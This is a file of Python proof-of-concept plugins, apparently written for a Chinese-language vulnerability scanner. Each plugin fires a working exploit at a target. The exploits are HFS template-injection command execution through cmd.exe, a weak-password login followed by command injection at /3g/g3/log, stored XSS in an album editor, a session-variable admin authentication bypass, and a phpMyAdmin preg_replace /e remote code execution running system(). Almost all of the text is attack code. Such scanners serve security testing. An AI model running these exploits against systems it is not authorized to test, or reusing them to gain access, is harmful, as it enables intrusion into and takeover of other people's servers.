def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) exec_payload = "/?search==%00{.exec|cmd.exe /c del res.}{.exec|cmd.exe /c echo>res 123456test.}" check_payload = "/?search==%00{.cookie|out|value={.load|res.}.}" attack_url = self.target s = requests.Session() s.get(attack_url + exec_payload, headers={}) r = s.get(attack_url + check_payload, headers={}) check_cookie = r.headers.get('set-cookie') if r.headers.get( 'set-cookie') else "" if "123456test" in check_cookie: self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) post_data = {'username': '******', 'password': '******'} code_exec = {'line': '1|echo \'vuln\''} try: # self.vuln: 当前扫描的漏洞 # self.target: 扫描目标 path = '{url}/home/login'.format(url=self.target) s = requests.Session() # self.output.info: 执行日志、流程信息的打印 self.output.info('使用用户信息 {up} 访问 {path}'.format(path=path, up=post_data)) response = s.post(path, data=post_data) if response.text == '1': # self.output.warn: 扫描特定漏洞发现的疑似漏洞信息打印 self.output.warn(self.vuln['auth'], '发现弱口令 {up}'.format(up=post_data)) path = self.target + '/3g/g3/log' self.output.info('发送 payload={0} 到 {1}'.format( code_exec, path)) result = s.post(path, data=code_exec) if 'vuln' in result.text: # self.output.report: 扫描到的漏洞信息的打印 self.output.report( self.vuln['rce'], "目标 {url} 存在 /3g/g3/log 任意命令执行漏洞".format( url=self.target)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip( '/') + '/' + (self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) session = requests.Session() path = '/usercpspacemanagealbum.aspx?page=1&mod=edit&albumid=32' UA = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36' Referer = '/usercpspacemanagealbum.aspx?page=1&mod=edit&albumid=32' payload = '''<script>console.log(document.cookie)</script>''' username = '' password = '' Host = self.target Url = Host + path Referer_url = self.target + Referer Auth = requests.auth.HTTPBasicAuth(username, password) PostData = { 'albumtitle': payload, 'albumid': '302', 'active': '', 'albumcate': '2', 'albumdescription': '', 'type': 0, 'password': '', 'Submit': '确定'} Header = {'User-Agent': UA, 'Referer': Referer_url, 'X-Requested-With': 'XMLHttpRequest'} # Login and get session session.get(Url, data=PostData, auth=Auth, headers=Header) # post editor to dz session.post(Url, data=PostData, headers=Header) # get result r = session.get( '{}/usercpspacemanagealbum.aspx'.format(Host), headers=Header) if payload in r.text: #args['success'] = True #args['poc_ret']['vul_url'] = Url self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format( target=self.target, name=self.vuln.name)) return None except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip( '/') + '/' + (self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) postdata = "_SESSION[login_in]=1&_SESSION[admin]=1&_SESSION[login_time]=300000000000000000000000\r\n" session = requests.Session() _req = session.post(self.target + "/index.php", data=postdata) # login test response = session.post(self.target+ "/admin/admin.php", data=postdata) content = response.text if "admin_form.php?action=form_list&nav=list_order" in content and "admin_main.php?nav=main" in content: self.output.report(self.vuln, '发现{target}存在{name}漏洞;\n漏洞地址为{url}'.format( target=self.target, name=self.vuln.name,url=self.target+"/admin/admin.php")) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) url_to_pma = self.target payload = "system('uname -a');" uname = '' upass = '' db = 'test' token = False custom_table = False table = 'prgpwn' size = 32 s = requests.Session() # you can manually add proxy support it's very simple ;) # s.proxies = {'http': "127.0.0.1:8080", 'https': "127.0.0.1:8080"} s.verify = False sql = '''CREATE TABLE `{0}` ( `first` varchar(10) CHARACTER SET utf8 NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; INSERT INTO `{0}` (`first`) VALUES (UNHEX('302F6500')); '''.format(table) resp = s.post(url_to_pma + "/?lang=en", dict(pma_username=uname, pma_password=upass)) if resp.status_code is 200: token_place = resp.text.find("token=") + 6 token = resp.text[token_place:token_place + 32] if token is False: # self.output.info("Cannot get valid authorization token.") sys.exit(1) if custom_table is False: data = { "is_js_confirmed": "0", "db": db, "token": token, "pos": "0", "sql_query": sql, "sql_delimiter": ";", "show_query": "0", "fk_checks": "0", "SQL": "Go", "ajax_request": "true", "ajax_page_request": "true", } resp = s.post(url_to_pma + "/import.php", data, cookies=requests.utils.dict_from_cookiejar( s.cookies)) if resp.status_code == 200: if "success" in resp.json(): if resp.json()["success"] is False: first = resp.json( )["error"][resp.json()["error"].find("<code>") + 6:] error = first[:first.find("</code>")] if "already exists" in error: print(error) else: print(("ERROR: " + error)) sys.exit(1) # build exploit exploit = { "db": db, "table": table, "token": token, "goto": "sql.php", "find": "0/e\0", "replaceWith": payload, "columnIndex": "0", "useRegex": "on", "submit": "Go", "ajax_request": "true" } resp = s.post(url_to_pma + "/tbl_find_replace.php", exploit, cookies=requests.utils.dict_from_cookiejar( s.cookies)) if resp.status_code == 200: result = resp.json( )["message"][resp.json()["message"].find("</a>") + 8:] if len(result): print(("result: " + result)) sys.exit(0) print( "Exploit failed!\n" "Try to manually set exploit parameters like --table, --database and --token.\n" "Remember that servers with PHP version greater than 5.4.6" " is not exploitable, because of warning about null byte in regexp" ) sys.exit(1) self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常:{}'.format(e))